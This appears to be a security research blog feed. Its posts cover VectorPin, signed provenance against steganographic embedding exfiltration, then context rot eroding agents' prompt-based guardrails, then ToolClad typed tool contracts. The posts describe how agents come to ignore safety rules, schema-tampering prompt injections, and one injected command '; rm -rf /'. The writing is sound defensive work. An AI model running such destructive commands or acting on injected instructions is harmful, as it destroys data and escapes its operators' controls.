data-points="W3sieCI6NTc2Ljk0NDYwMTUyMTg5MjMsInkiOjUwMi43NzI3MjY1MjE4OTIzN30seyJ4Ijo0OTQuMzUxNTYyNSwieSI6NTg4LjA2MjV9LHsieCI6NDk0LjM1MTU2MjUsInkiOjY4Mi40Mjk2ODc1fV0=" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M673.524,502.773L687.29,516.988C701.055,531.203,728.586,559.633,742.352,579.348C756.117,599.063,756.117,610.063,756.117,615.563L756.117,621.063" id="L_Q2_Q3_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_Q2_Q3_0" data-points="W3sieCI6NjczLjUyNDE0ODQ3ODEwNzcsInkiOjUwMi43NzI3MjY1MjE4OTIzN30seyJ4Ijo3NTYuMTE3MTg3NSwieSI6NTg4LjA2MjV9LHsieCI6NzU2LjExNzE4NzUsInkiOjYyNS4wNjI1fV0=" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M709.027,770.707L695.634,784.722C682.241,798.737,655.454,826.767,642.061,855.473C628.668,884.18,628.668,913.563,628.668,928.254L628.668,942.945" id="L_Q3_O4_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_Q3_O4_0" data-points="W3sieCI6NzA5LjAyNjg4NzcxMTczNzUsInkiOjc3MC43MDY1NzUyMTE3Mzc1fSx7IngiOjYyOC42Njc5Njg3NSwieSI6ODU0Ljc5Njg3NX0seyJ4Ijo2MjguNjY3OTY4NzUsInkiOjk0Ni45NDUzMTI1fV0=" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M803.207,770.707L816.601,784.722C829.994,798.737,856.78,826.767,870.173,846.282C883.566,865.797,883.566,876.797,883.566,882.297L883.566,887.797" id="L_Q3_Q4_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_Q3_Q4_0" data-points="W3sieCI6ODAzLjIwNzQ4NzI4ODI2MjUsInkiOjc3MC43MDY1NzUyMTE3Mzc1fSx7IngiOjg4My41NjY0MDYyNSwieSI6ODU0Ljc5Njg3NX0seyJ4Ijo4ODMuNTY2NDA2MjUsInkiOjg5MS43OTY4NzV9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M841.019,1037.547L830.088,1050.804C819.156,1064.062,797.293,1090.578,786.361,1109.336C775.43,1128.094,775.43,1139.094,775.43,1144.594L775.43,1150.094" id="L_Q4_O5_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_Q4_O5_0" data-points="W3sieCI6ODQxLjAxOTI0OTI2NjkyMDUsInkiOjEwMzcuNTQ2NTkzMDE2OTIwNX0seyJ4Ijo3NzUuNDI5Njg3NSwieSI6MTExNy4wOTM3NX0seyJ4Ijo3NzUuNDI5Njg3NSwieSI6MTE1NC4wOTM3NX1d" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M926.114,1037.547L937.045,1050.804C947.977,1064.062,969.84,1090.578,980.772,1111.336C991.703,1132.094,991.703,1147.094,991.703,1154.594L991.703,1162.094" id="L_Q4_O6_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_Q4_O6_0" data-points="W3sieCI6OTI2LjExMzU2MzIzMzA3OTUsInkiOjEwMzcuNTQ2NTkzMDE2OTIwNX0seyJ4Ijo5OTEuNzAzMTI1LCJ5IjoxMTE3LjA5Mzc1fSx7IngiOjk5MS43MDMxMjUsInkiOjExNjYuMDkzNzV9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /></g><g class="edgeLabels"><g class="edgeLabel"><g class="label" data-id="L_V_Q1_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g><g class="edgeLabel" transform="translate(119.0546875, 317.75)"><g class="label" data-id="L_Q1_O1_0" transform="translate(-8.8984375, -12)"><foreignObject width="17.796875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "><p>no</p></span></div></foreignObject></g></g><g class="edgeLabel" transform="translate(378.59375, 317.75)"><g class="label" data-id="L_Q1_O2_0" transform="translate(-46.6953125, -12)"><foreignObject width="93.390625" height="24"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "><p>key unknown</p></span></div></foreignObject></g></g><g class="edgeLabel" transform="translate(625.234375, 317.75)"><g class="label" data-id="L_Q1_Q2_0" transform="translate(-12.453125, -12)"><foreignObject width="24.90625" height="24"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "><p>yes</p></span></div></foreignObject></g></g><g class="edgeLabel" transform="translate(494.3515625, 588.0625)"><g class="label" data-id="L_Q2_O3_0" transform="translate(-8.8984375, -12)"><foreignObject width="17.796875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "><p>no</p></span></div></foreignObject></g></g><g class="edgeLabel" transform="translate(756.1171875, 588.0625)"><g class="label" data-id="L_Q2_Q3_0" transform="translate(-12.453125, -12)"><foreignObject width="24.90625" height="24"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "><p>yes</p></span></div></foreignObject></g></g><g class="edgeLabel" transform="translate(628.66796875, 854.796875)"><g class="label" data-id="L_Q3_O4_0" transform="translate(-8.8984375, -12)"><foreignObject width="17.796875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "><p>no</p></span></div></foreignObject></g></g><g class="edgeLabel" transform="translate(883.56640625, 854.796875)"><g class="label" data-id="L_Q3_Q4_0" transform="translate(-12.453125, -12)"><foreignObject width="24.90625" height="24"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "><p>yes</p></span></div></foreignObject></g></g><g class="edgeLabel" transform="translate(775.4296875, 1117.09375)"><g class="label" data-id="L_Q4_O5_0" transform="translate(-8.8984375, -12)"><foreignObject width="17.796875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "><p>no</p></span></div></foreignObject></g></g><g class="edgeLabel" transform="translate(991.703125, 1117.09375)"><g class="label" data-id="L_Q4_O6_0" transform="translate(-12.453125, -12)"><foreignObject width="24.90625" height="24"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "><p>yes</p></span></div></foreignObject></g></g></g><g class="nodes"><g class="node default  " id="flowchart-V-0" transform="translate(378.59375, 35)"><rect class="basic label-container" style="" x="-54.8984375" y="-27" width="109.796875" height="54" /><g class="label" style="" transform="translate(-24.8984375, -12)"><rect /><foreignObject width="49.796875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Verifier</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-Q1-1" transform="translate(378.59375, 196.375)"><polygon points="84.375,0 168.75,-84.375 84.375,-168.75 0,-84.375" class="label-container" transform="translate(-83.875, 84.375)" /><g class="label" style="" transform="translate(-57.375, -12)"><rect /><foreignObject width="114.75" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Signature valid?</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-O1-3" transform="translate(119.0546875, 452.90625)"><rect class="basic label-container" style="" x="-111.0546875" y="-39" width="222.109375" height="78" /><g class="label" style="" transform="translate(-81.0546875, -24)"><rect /><foreignObject width="162.109375" height="48"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>SIGNATURE_INVALID<br />forgery / wrong key</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-O2-5" transform="translate(378.59375, 452.90625)"><rect class="basic label-container" style="" x="-98.484375" y="-39" width="196.96875" height="78" /><g class="label" style="" transform="translate(-68.484375, -24)"><rect /><foreignObject width="136.96875" height="48"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>UNKNOWN_KEY<br />unregistered signer</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-Q2-7" transform="translate(625.234375, 452.90625)"><polygon points="98.15625,0 196.3125,-98.15625 98.15625,-196.3125 0,-98.15625" class="label-container" transform="translate(-97.65625, 98.15625)" /><g class="label" style="" transform="translate(-71.15625, -12)"><rect /><foreignObject width="142.3125" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>vec_hash matches?</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-O3-9" transform="translate(494.3515625, 721.4296875)"><rect class="basic label-container" style="" x="-115.3984375" y="-39" width="230.796875" height="78" /><g class="label" style="" transform="translate(-85.3984375, -24)"><rect /><foreignObject width="170.796875" height="48"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>VECTOR_TAMPERED<br />potential steganography</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-Q3-11" transform="translate(756.1171875, 721.4296875)"><polygon points="96.3671875,0 192.734375,-96.3671875 96.3671875,-192.734375 0,-96.3671875" class="label-container" transform="translate(-95.8671875, 96.3671875)" /><g class="label" style="" transform="translate(-69.3671875, -12)"><rect /><foreignObject width="138.734375" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>src_hash matches?</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-O4-13" transform="translate(628.66796875, 985.9453125)"><rect class="basic label-container" style="" x="-110.75" y="-39" width="221.5" height="78" /><g class="label" style="" transform="translate(-80.75, -24)"><rect /><foreignObject width="161.5" height="48"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>SOURCE_MISMATCH<br />upstream drift</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-Q4-15" transform="translate(883.56640625, 985.9453125)"><polygon points="94.1484375,0 188.296875,-94.1484375 94.1484375,-188.296875 0,-94.1484375" class="label-container" transform="translate(-93.6484375, 94.1484375)" /><g class="label" style="" transform="translate(-67.1484375, -12)"><rect /><foreignObject width="134.296875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>model id matches?</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-O5-17" transform="translate(775.4296875, 1193.09375)"><rect class="basic label-container" style="" x="-124.7109375" y="-39" width="249.421875" height="78" /><g class="label" style="" transform="translate(-94.7109375, -24)"><rect /><foreignObject width="189.421875" height="48"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>MODEL_MISMATCH<br />cross-model fragmentation</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-O6-19" transform="translate(991.703125, 1193.09375)"><rect class="basic label-container" style="" x="-41.5625" y="-27" width="83.125" height="54" /><g class="label" style="" transform="translate(-11.5625, -12)"><rect /><foreignObject width="23.125" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>OK</p></span></div></foreignObject></g></g></g></g></g></svg>

<p>The coverage relative to the studied attacks is structural rather than empirical. Every perturbation technique in the paper modifies the stored vector after the model produced it. Each modification therefore changes <code class="language-plaintext highlighter-rouge">vec_hash</code> and fails verification. Cross-model fragmentation is caught by the <code class="language-plaintext highlighter-rouge">model</code> field. Under the paper’s post-pinning tamper model, there is no operating point of any of these techniques that VectorPin doesn’t catch, because the protocol commits to the actual model output and any deviation is detectable by anyone holding the public key.</p>

<p>We use vanilla Ed25519 over SHA-256. The cryptographic primitives are not novel and they aren’t supposed to be. The contribution is the canonical byte form for floating-point arrays, the wire-format design, and the cross-language compatibility discipline.</p>

<p>Reference implementations ship in Python, Rust, and TypeScript under Apache 2.0 (<code class="language-plaintext highlighter-rouge">pip install vectorpin</code>, <code class="language-plaintext highlighter-rouge">cargo add vectorpin</code>, <code class="language-plaintext highlighter-rouge">npm install vectorpin</code>), locked together by shared test vectors that gate every change to any side. A drift-detection job in CI regenerates the fixtures on every Python-side change and fails the build if the regenerated bytes differ from what’s committed, so a seemingly-innocuous serialization change can’t silently break Rust or TypeScript verification. A pin produced by any of the three verifies on the other two. A Go port is next.</p>

<p>The Rust port matters because Rust runtimes (Symbiont among them) are increasingly the boundary at which RAG-derived data is consumed by agents. Verification has to happen in-process, without a polyglot sidecar. The TypeScript port matters because a large fraction of RAG application code (LangChain.js, LlamaIndex.TS, edge-deployed retrievers) lives in Node and the browser, and asking those teams to shell out to Python for every read is a non-starter.</p>

<p>Alongside the SDKs, VectorPin ships alpha adapters for the major production vector stores: <strong>LanceDB</strong>, <strong>Chroma</strong>, <strong>Pinecone</strong>, and <strong>Qdrant</strong>, with <strong>pgvector</strong> and <strong>FAISS</strong> on the roadmap. The adapters handle the per-backend specifics (where pin metadata lives, how source text is recovered, how server-side filters compose with verification) so an operator integrating VectorPin doesn’t have to re-derive the canonical-bytes contract for each store. The project home, install commands, adapter status, and current spec live at <a href="https://vectorpin.org">vectorpin.org</a>.</p>

<h2 id="provenance-over-guessing">Provenance over guessing</h2>

<p>The framing we propose for the security community: embedding-level integrity is a deployable, standardizable control. It is not a fundamental property of vector databases as built today, and it can become one without inventing new cryptography.</p>

<p>A statistical detector asks “does this vector look anomalous.” That’s useful, but it’s probabilistic, training-data-dependent, and brittle against adaptive attackers. A signed commitment asks “does this vector match what the producer attested.” Either it does or it doesn’t.</p>

<p>The two layers are complementary rather than competing. Detection closes the cheap-attack regime where signatures haven’t been deployed. Provenance closes the durable-attack regime where rotation slips past detectors and adaptive attackers slip past everything else. A defense story that includes both is closed against the threat model in the paper. Either one alone leaves residue.</p>

<h2 id="what-vectorpin-doesnt-do">What VectorPin doesn’t do</h2>

<p>The protocol defends a chain of custody after a known-good ingestion event. It does not validate the ingestion event itself. An attacker who controls the signing pipeline can sign whatever vector they want, and verification will succeed. An attacker who modifies the source document before embedding gets an honest signature over the modified content. An attacker who steals the private signing key produces arbitrary valid pins.</p>

<p>These are not bugs in the protocol. They are scope boundaries we set explicitly. Pre-ingestion content integrity controls (signed source documents, in-toto attestations on the ingestion pipeline) and standard secret-management practice (KMS, HSM, time-bounded keys, rotation) remain necessary and complementary. The point of writing the limits down is so that a deployment can match each non-claim to the relevant upstream control rather than discovering the gap during an incident.</p>

<h2 id="where-this-fits">Where this fits</h2>

<p>RAG security conversations have largely been about prompt injection at the LLM boundary. That’s the visible layer and it’s gotten the attention it deserves. The retrieval substrate underneath has gotten less.</p>

<p>Embeddings are not search hints anymore. They are part of the trust boundary that decides what an AI system sees, what it retrieves, and what it treats as relevant. For agents that act on retrieved content, embeddings are part of the chain that produces real-world effects.</p>

<p>A layer that load-bearing should be verifiable. The components to make that practical (Ed25519, SHA-256, canonical byte forms, signed metadata) have been deployed in adjacent provenance systems for years (sigstore for software artifacts, in-toto for build pipelines, C2PA for media, SchemaPin for tool schemas). The work was applying the design family to a new substrate and shipping reference implementations that interoperate cleanly across the languages that real RAG pipelines are built in.</p>

<p>What we’d like to see next is one of the major vector database vendors shipping native pin verification as a built-in feature. That’s the lowest-friction adoption path: it bypasses third-party library integration, makes the control auditable through the vendor’s compliance attestations, and puts competitive pressure on the rest of the category. The OSS-first release strategy is partly designed to make that adoption tractable. The protocol is open, the references are Apache 2.0, and the cross-language fixtures mean a vendor can adopt it in their own codebase without coupling to ours.</p>

<p>Embedding integrity should be a normal part of secure RAG architecture. Today it isn’t. That gap is closeable, the closure is cheap, and the work is sitting on GitHub.</p>

<p>Paper: <a href="https://doi.org/10.5281/zenodo.20058255">https://doi.org/10.5281/zenodo.20058255</a> · <a href="https://arxiv.org/abs/2605.13764">arXiv:2605.13764</a></p>

<p>VectorPin: <a href="https://vectorpin.org">vectorpin.org</a> · <a href="https://github.com/ThirdKeyAI/VectorPin">github.com/ThirdKeyAI/VectorPin</a></p>

<p>VectorSmuggle: <a href="https://github.com/jaschadub/VectorSmuggle">https://github.com/jaschadub/VectorSmuggle</a></p>]]></content><author><name>ThirdKey Team</name></author><category term="AI Security" /><category term="RAG" /><category term="Cryptography" /><category term="vector databases" /><category term="embeddings" /><category term="rag security" /><category term="steganography" /><category term="provenance" /><category term="vectorpin" /><category term="ed25519" /><category term="integrity" /><category term="retrieval augmented generation" /><category term="ai infrastructure" /><summary type="html"><![CDATA[A new ThirdKey Research preprint on steganographic exfiltration in embedding stores, and a cryptographic provenance defense.]]></summary></entry><entry><title type="html">Your Agent’s Guardrails Are Rotting</title><link href="http://research.thirdkey.ai/blog/your-agents-guardrails-are-rotting/" rel="alternate" type="text/html" title="Your Agent’s Guardrails Are Rotting" /><published>2026-04-13T00:00:00+00:00</published><updated>2026-04-13T00:00:00+00:00</updated><id>http://research.thirdkey.ai/blog/your-agents-guardrails-are-rotting</id><content type="html" xml:base="http://research.thirdkey.ai/blog/your-agents-guardrails-are-rotting/"><![CDATA[<p><em>Why prompt-based safety degrades under the same pressures as human working memory, and what to build instead.</em></p>

<p><strong>Jascha Wanger — ThirdKey AI Research</strong></p>

<hr />

<p>AI agents fail the same way human brains do. Not by losing information, but by losing the ability to act on information they still have.</p>

<p>Practitioners have started calling this <strong>context rot</strong>. The neuroscience literature offers a closely related construct: <strong>goal neglect</strong>. And if you’re building agents that touch anything consequential, it’s the most important failure mode you’re not thinking about.</p>

<h2 id="the-failure-signature">The Failure Signature</h2>

<p>John Duncan at Cambridge’s MRC Cognition and Brain Sciences Unit first formalized goal neglect in 1996. His critical finding, extended in 2008: goal neglect is not driven by how hard the task is in the moment. It’s driven by how complex the instructions were during setup. Two groups of participants performed the exact same task. The only difference was that one group received more complex instructions. That group showed significantly more goal neglect, even though moment-to-moment demands were identical.</p>

<p>The parallel to LLMs is suggestive and operationally useful, though not yet a demonstrated mechanistic equivalence. Deep into a long conversation, a model’s compliance with system prompt constraints degrades and becomes less reliable. The constraint is still in the context window. The model can locate it, quote it, explain its purpose. But the attention mechanism, competing across tens or hundreds of thousands of tokens, lets it drop out of the behavior-generation process.</p>

<p>Still in context. Not in behavior.</p>

<p>And the observed vulnerability ordering is consistent across both domains. Late-added rules tend to fail first. Conditional overrides degrade next. Edge cases requiring sustained monitoring are early casualties. Core rules, the ones that are unconditional and frequently activated, survive longest. This isn’t yet a rigorous experimental result for LLMs, but it’s a strong engineering heuristic backed by both the neuroscience and practitioner experience.</p>

<p>Bigger context windows push the failure point out. They don’t eliminate it.</p>

<h2 id="now-make-it-adversarial">Now Make It Adversarial</h2>

<p>Most discussion of context rot treats it as an engineering challenge. How do you build orchestration that works despite it? Fair question. But there’s a sharper one:</p>

<p>What happens when the instructions that rot are your security guardrails?</p>

<p>Every agent framework that relies on system prompt instructions for safety is betting that those instructions will survive context rot. The instruction that says “never execute shell commands without user approval.” The rule that says “do not access files outside the project directory.” The constraint that says “if the tool schema has changed since last verification, halt and re-verify.”</p>

<p>These are exactly the class of instructions that the goal neglect framework predicts will be most vulnerable. They’re conditional. They require monitoring for a trigger event. They were typically added after the core task instructions. By the taxonomy of goal neglect, they are the components most likely to drop out of active behavior under load.</p>

<p>And unlike a coding agent that produces a buggy function, a security constraint that rots has a fundamentally different failure profile. The agent doesn’t just produce worse output. It produces output that was supposed to be structurally impossible.</p>

<h2 id="the-deepmind-numbers">The DeepMind Numbers</h2>

<p>Kim et al.’s December 2025 preprint (Google Research / Google DeepMind, later revised in April 2026) makes this concrete. The latest revision reports 260 configurations across 6 benchmarks and 3 LLM families. Their finding: the <strong>Independent</strong> multi-agent architecture, where agents operate without centralized coordination, amplified errors up to 17.2x compared to single-agent baselines. Not 17% worse. Seventeen times worse. Centralized coordination contained amplification much more effectively.</p>

<p>A March 2026 preprint from Xie et al., titled “From Spark to Fire,” identified the propagation mechanics: cascade amplification (minor inaccuracies solidify into system-level false consensus), topological sensitivity (the shape of the communication graph determines propagation speed), and consensus inertia (once false consensus forms, it resists correction).</p>

<p>Now combine these findings. Context rot degrades the guardrails that are supposed to catch errors. Multi-agent communication amplifies the errors that get through. And without explicit verification or rollback layers, systems may have no reliable self-correcting mechanism once false consensus forms.</p>

<p>This is the threat model that prompt engineering alone cannot reliably address.</p>

<h2 id="what-structural-enforcement-actually-means">What Structural Enforcement Actually Means</h2>

<p>Practitioners have converged on several patterns that work despite context rot. Fresh context per iteration. External memory. Graph reasoning outside the context window. Molecular decomposition into single-step tasks. All good engineering.</p>

<p>But for security specifically, there’s a stronger version of this principle: don’t put your enforcement in the context window at all.</p>

<p>This is the core architectural thesis behind Symbiont’s ORGA loop. ORGA stands for Observe-Reason-Gate-Act. The key phase is Gate. When the LLM finishes reasoning and proposes an action, that proposal passes through a Gate evaluation before execution. The Gate runs Cedar policy evaluation. Cedar is a policy language originally developed by AWS for authorization decisions.</p>

<p>The critical property: the Gate phase operates outside LLM influence. It’s not an instruction in the system prompt that can rot. It’s not a rule that competes for attention with the agent’s task context. It’s a compile-time enforced phase transition in a Rust typestate machine. The agent cannot skip from Reason to Act. The type system makes that transition structurally inexpressible.</p>

<p>This is the difference between telling an agent “check the policy before acting” (an instruction that will eventually rot) and making it impossible for the agent to act without the policy check having occurred (a structural guarantee that cannot rot because it doesn’t live in the context window).</p>

<p>The same pattern shows up elsewhere: graph reasoning, scheduling, and coordination logic pushed out of the prompt and into compiled code sitting outside the LLM’s attention budget. Thin agent, thick enforcement layer.</p>

<h2 id="allow-lists-dont-rot-but-they-can-be-incomplete">Allow-Lists Don’t Rot (But They Can Be Incomplete)</h2>

<p>Context rot follows a consistent vulnerability pattern, and the agentic security implication follows naturally: deny-list rules are exactly the type of instructions most vulnerable to degradation.</p>

<p>A deny-list rule is inherently conditional. “If the agent tries to do X, block it.” It requires the enforcement mechanism to monitor for a trigger, detect it, and intervene. In a prompt-based system, that’s a conditional instruction competing for attention. In Duncan’s taxonomy, it’s a late-added monitoring rule. It’s the first thing to go.</p>

<p>An allow-list doesn’t have this problem. If the agent can only express actions that are pre-defined in a typed contract, dangerous actions aren’t detected and blocked. They’re inexpressible. There’s no instruction to rot because the constraint isn’t an instruction. It’s a structural property of what the agent can say.</p>

<p>Allow-lists can still be incomplete or mis-scoped. A contract that’s too permissive provides a false sense of safety. But a mis-scoped allow-list is a specification bug you can audit and fix. A rotted deny-list is a silent failure you discover in production.</p>

<p>This is what ToolClad does for tool interfaces. Instead of letting the LLM generate arbitrary shell commands and filtering them, ToolClad defines typed parameter slots, output schemas, and invocation templates. The LLM fills in typed fields. The executor validates against the contract and constructs the command from a template. A prompt injection that tries to add <code class="language-plaintext highlighter-rouge">; rm -rf /</code> fails not because a filter caught it, but because the semicolon has no valid slot to occupy.</p>

<p>SchemaPin extends this to tool discovery. Before an agent uses a tool, it cryptographically verifies the tool’s schema against a pinned signature. A schema-modification attack (swap a benign parameter description for an instruction to exfiltrate data) fails because the signature won’t match. This isn’t a rule in the system prompt. It’s ECDSA verification in code. SchemaPin’s TOFU (trust-on-first-use) pinning model materially protects against post-discovery tampering; first-use compromise and signing key theft require additional mitigations at the operational layer.</p>

<h2 id="the-convergence">The Convergence</h2>

<p>The agentic AI infrastructure being built in 2025-2026 is converging on solutions to a cognitive constraint that neuroscience identified thirty years ago. Different substrate, same failure signature, same solutions.</p>

<p>The agentic AI <em>security</em> infrastructure being built right now faces the same convergence. Every team that ships agents into production eventually discovers that prompt-based guardrails degrade under load. The ones who’ve been at it longest have all arrived at the same conclusion: enforcement that lives inside the context window is enforcement that will eventually fail.</p>

<p>The solutions are structural. Policy evaluation outside the LLM. Typed contracts that constrain expressible actions. Cryptographic verification that doesn’t depend on the agent remembering to check. Compile-time guarantees that make invalid state transitions inexpressible.</p>

<p>Context rot is real. Goal neglect is the best model we have for why it happens. And the fix is not better prompts.</p>

<p>It’s architecture.</p>

<hr />

<p><em>Jascha Wanger is the founder of ThirdKey AI, building cryptographic trust infrastructure for enterprise AI agents. The trust stack includes Symbiont (zero-trust agent runtime), SchemaPin (tool schema verification), AgentPin (agent identity), and ToolClad (declarative tool contracts).</em></p>

<p><strong>Links:</strong></p>
<ul>
  <li>Symbiont: <a href="https://github.com/ThirdKeyAI/Symbiont">https://github.com/ThirdKeyAI/Symbiont</a></li>
  <li>SchemaPin: <a href="https://github.com/ThirdKeyAI/SchemaPin">https://github.com/ThirdKeyAI/SchemaPin</a></li>
  <li>AgentPin: <a href="https://github.com/ThirdKeyAI/AgentPin">https://github.com/ThirdKeyAI/AgentPin</a></li>
  <li>ToolClad: <a href="https://github.com/ThirdKeyAI/ToolClad">https://github.com/ThirdKeyAI/ToolClad</a></li>
  <li>OATS Specification: <a href="https://thirdkey.ai/oats">https://thirdkey.ai/oats</a></li>
</ul>]]></content><author><name>ThirdKey Team</name></author><category term="AI Security" /><category term="Agent Runtime" /><category term="Cognitive Science" /><category term="context rot" /><category term="goal neglect" /><category term="ai agents" /><category term="security" /><category term="guardrails" /><category term="symbiont" /><category term="toolclad" /><category term="schemapin" /><category term="trust stack" /><category term="agentic systems" /><summary type="html"><![CDATA[Why prompt-based safety degrades under the same pressures as human working memory, and what to build instead.]]></summary></entry><entry><title type="html">Stop Letting Your Agent Write Shell Commands</title><link href="http://research.thirdkey.ai/blog/introducing-toolclad-declarative-tool-contracts/" rel="alternate" type="text/html" title="Stop Letting Your Agent Write Shell Commands" /><published>2026-04-03T00:00:00+00:00</published><updated>2026-04-03T00:00:00+00:00</updated><id>http://research.thirdkey.ai/blog/introducing-toolclad-declarative-tool-contracts</id><content type="html" xml:base="http://research.thirdkey.ai/blog/introducing-toolclad-declarative-tool-contracts/"><![CDATA[<p><em>Introducing ToolClad: Declarative Tool Interface Contracts for Agentic Runtimes</em></p>

<p><strong>Jascha Wanger — ThirdKey AI Research</strong></p>

<hr />

<p>Every team building agentic systems hits the same wall eventually. You have a CLI tool. You want your agent to use it. The question is always the same: “How do I safely let an agent run <code class="language-plaintext highlighter-rouge">nmap</code>?”</p>

<p>The current answer, across the entire ecosystem, is: write custom glue code. For each tool, you build a wrapper script with argument sanitization, timeout enforcement, output parsing, evidence capture, policy mappings, capability registration, and authorization rules. That is seven steps per tool. It does not scale.</p>

<p>So we built ToolClad.</p>

<h2 id="the-problem-is-structural">The Problem Is Structural</h2>

<p>The popular approach to agent tool safety is the sandbox. Let the LLM generate a shell command, then intercept it on the way out. Pattern-match against known-dangerous operations. Block the bad ones, allow the rest.</p>

<p>This is a deny-list. And deny-lists have gaps by definition.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>LLM generates shell command -&gt; sandbox intercepts -&gt; allow/deny
</code></pre></div></div>

<p>The agent has already formulated an arbitrary command string. You are hoping your filter catches everything dangerous. You are playing whack-a-mole with an adversary that has the entire shell language at its disposal.</p>

<p>For interactive tools the gap is even wider. An agent with an open <code class="language-plaintext highlighter-rouge">psql</code> connection can <code class="language-plaintext highlighter-rouge">DROP TABLE</code> as easily as it can <code class="language-plaintext highlighter-rouge">SELECT *</code>, because both are just text sent to a PTY. A sandbox watching syscalls sees identical operations. The semantic difference is invisible to the enforcement layer.</p>

<p>Browser agents face the same problem. Today’s browser-capable agents (Claude in Chrome, OpenAI Operator, Playwright-based systems) rely on the LLM’s instruction-following to stay on allowed domains, avoid submitting sensitive forms, and not execute arbitrary JavaScript. That is prompt-based security. It is exactly as robust as the model’s compliance on any given inference.</p>

<h2 id="toolclad-inverts-the-model">ToolClad Inverts the Model</h2>

<p>ToolClad takes the opposite approach. Instead of generating commands and filtering them, the agent fills typed parameters in a declarative manifest. The runtime validates those parameters, constructs the command from a template, and executes it. The agent never sees or generates a shell command.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>LLM fills typed parameters -&gt; policy gate -&gt; executor validates -&gt;
  constructs command from template -&gt; executes -&gt; structured JSON
</code></pre></div></div>

